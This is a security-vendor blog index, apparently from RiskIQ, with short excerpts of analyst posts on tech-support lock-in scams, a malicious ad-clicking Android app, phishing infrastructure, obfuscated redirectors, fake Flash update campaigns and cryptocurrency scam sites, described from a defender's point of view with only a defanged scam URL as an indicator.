Blog

Interesting Crawls

Analyst Interesting Crawls

Not so Fast – Some Online Scams Don’t Take No for an Answer

Some online scams literally don't take no for an answer.

Going beyond tricking users with flashy ads for fake products or prizes or scaring them into trying to download phony software with the goal of redirecting them elsewhere, some scammers go a step further—they don't even let their victims leave their page.

While doing page reviews for RiskIQ's scam model (link), I came across an interesting crawl. Because it was missing a screenshot and, strangely, there seemed to be a phone number in the URL pathway, I decided to take a closer look.

(hxxps://d7wbuen63chon.cloudfront[dot]net/new/index.html?phone=+1-855-500-0184#forward).  

Fig -1 PDF download prompt

Continue Reading
Analyst Interesting Crawls

Phone Scam Uses Scammy App That Infects Phones for Ad-clicking and Info-Stealing Controls Over 60,000 Devices

Also by Aaron Inness

At RiskIQ, we observe thousands of scam web pages in all forms—everything from fake pharmaceutical ads to phony prizes to spurious tech support and label them accordingly. In the mobile ecosystem, popular scams include ‘your device is running low!’, ‘you need to update your device!’ or ‘you need to install this antivirus to save your device!’ In today’s post, we’ll take a look at one of these scams that surfaced in our crawl data.

Although the app these scam pages send users to does its advertised function, it also has a nasty secret—it infects victims’ devices and comes with a side of information stealing and ad-clicking.

Cleanup required!

Many of the millions of scams we crawl at RiskIQ are relatively straightforward, but every once in a while we find something unique. Usually, scams point to other web pages, but in this case, we noticed one that redirects victims who click to Google Play, where they are served a malicious app. To get to the bottom of how the scam works from beginning to end, we pointed our investigative resources at it and outlined our findings below.

Continue Reading
Analyst Interesting Crawls

Linking Infrastructure from Phishing Data Exfiltrations

Phishing is still one of the most relentless and quickly evolving online threats facing today's businesses.

At RiskIQ, we process tons of web-related threat data, including phishing incidents. From various sources, we receive URLs which may be indicative of phishing, examine the pages with our web-crawling infrastructure, which experiences them as a real user would, and feed the data it collects through our machine-learning technology to classify each detected phishing page appropriately.

Phishing pages' infrastructure usually takes two forms: self-maintained custom infrastructure and abused or compromised infrastructure belonging to someone else. Below is an instance of a phishing page for email involving the latter. It's somewhat generic, but an excellent example of something commonly leveled against businesses: 

Phishing is still one of the most relentless threats facing today's businesses. We process tons of web-related threat data, including phishing incidents

Fig-1 Phishing page

Looking through some sources online, I dug up some additional instances of this phishing kit:

Continue Reading
Labs Interesting Crawls

This is How Threat Actors Overwhelm the Defenses of Ad Networks

Also by Ian Cowger

Traffic is a vital commodity in the cybercrime ecosystem that enables criminals to monetize their campaigns in various ways, whether by hijacking traffic from ad networks, carrying out phishing attacks, distributing malware to vulnerable computers, or sending victims to far-reaching networks of scam sites.  

Many attackers protect this source of revenue by utilizing traffic and device filtering techniques to block out security researchers and optimize the type of traffic they get. In this post, we'll examine a tactic we see more and more in the wild—obfuscated code on pages that redirect users to malicious pages. We’ll also take a look at why scam networks that burn through huge swathes of cheap, disposable infrastructure are a destination of choice for traffic captured by these campaigns.

The redirector below, which we call CaesarV after its use of a Caesar cipher to obfuscate code on its pages that cause redirection, is, in this case, sending traffic to what RiskiQ's models identified as fake tech support pages.

Where does this traffic come from?

Continue Reading
Labs Analyst Interesting Crawls

SpeedFlash and ScrnSize: Fake Flash Updates with a Side of Domain Shadowing

Fake Flash download pages have come to be a marker for all manners of malicious activity. We’ve seen it in conjunction with exploit kits, banking Trojans, watering hole attacks, malvertising, adware, phishing, digital currency miners, and multitudes of other digital threats. Often, there are traffic distribution systems or other means of traffic filtering upstream of these sites and many campaigns use decoy sites to which they dump unwanted traffic rather than serving up the malicious payload.

Today, we’ll be looking at a redirection sequence that brings many of these malicious tactics together, showing evidence of a campaign that uses fingerprinting and filtering, domain infringement, domain shadowing, indicators of cookie tracking, and malicious downloads using fake Flash. From one redirect, we were able to uncover thousands of artifacts pointing to a more extensive malicious campaign preying on potentially thousands of victims.

Digging In

Below is a typical redirection sequence from this particular malicious campaign leading from an initial fingerprinting and redirection page to a page serving fake Flash to a “speed test” decoy page:

Fig-1 Sequence leading from fingerprinting page a page serving fake Flash which redirects to a speed test decoy page.

Continue Reading
Labs Interesting Crawls

Networks of Scammy Cryptocurrency Sites Promise Payday that Never Comes

With cryptocurrency mania in full swing, investors must now navigate an entirely new, rapidly expanding threat landscape. Coins, alt-coins, tokens, exchanges, and other cryptocurrency apps—both legitimate and malicious—pop up in the marketplace every day, many of which leverage the massive popularity and 'get-rich-quick' promise of cryptocurrency to attract new users. Some of these apps are stood up to target users, while many become the target of hackers themselves.

RiskIQ observes cryptocurrency threat campaigns that show threat actors bank on the fact that, to many people, the concept of cryptocurrency is nebulous at best, but still seen as a viable way to make money. This widespread perception creates fertile ground for scammers, who take advantage by creating all manners of cryptocurrency fakery designed to fool people out of money. Already, RiskIQ has detected and blacklisted dozens of fake cryptocurrency apps in the mobile app ecosystem that exploit the names of well-known exchanges and mixers, as well as hundreds of sites that falsely promise to make users money in other ways.

The site cryptcoins.biz, for example, has a glossy crypto veneer but resembles a common advance fee scheme. Users can purchase phony "coins," marketed as various "cryptocurrencies" with real money (rubles) via Payeer, with the goal of being able to exchange them for a return on investment later. They can also earn them through "bonuses" rewarded for taking actions such as clicking on ads, visiting web pages, and recruiting new users.

However, the exchange rates for these coins to rubles are intentionally confusing and absurdly steep. To receive a payout via Payeer, users must first exchange their coins for "silver," which they then exchange for rubles at a rate of 100 "coins" to 1 "silver," and 100 "silver" to 1 ruble. This rate makes for a fantastic deal for the people who run the site, but it's a shakedown for customers.

Fig-1 Phony coins named after actual cryptocurrencies promising investors a profit

Continue Reading